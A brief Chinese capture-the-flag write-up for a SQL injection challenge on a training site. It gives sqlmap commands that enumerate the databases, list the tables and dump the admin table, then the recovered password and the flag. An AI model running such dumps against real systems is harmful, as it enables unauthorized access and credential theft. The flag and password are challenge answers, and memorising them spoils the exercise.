题目链接:http://www.shiyanbar.com/ctf/2
- 随便输入 “登录失败,错误的用户名和密码”
- 直接sqlmap跑
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=pass&action=login" --dbs
查到库test - 查表
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=pass&action=login" --table -D test
找到表admin - 查字段
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=pass&action=login" --dump -D test -T admin
得到密码idnuenna - 得到key
flag:!@#WwwN5f0cu5coM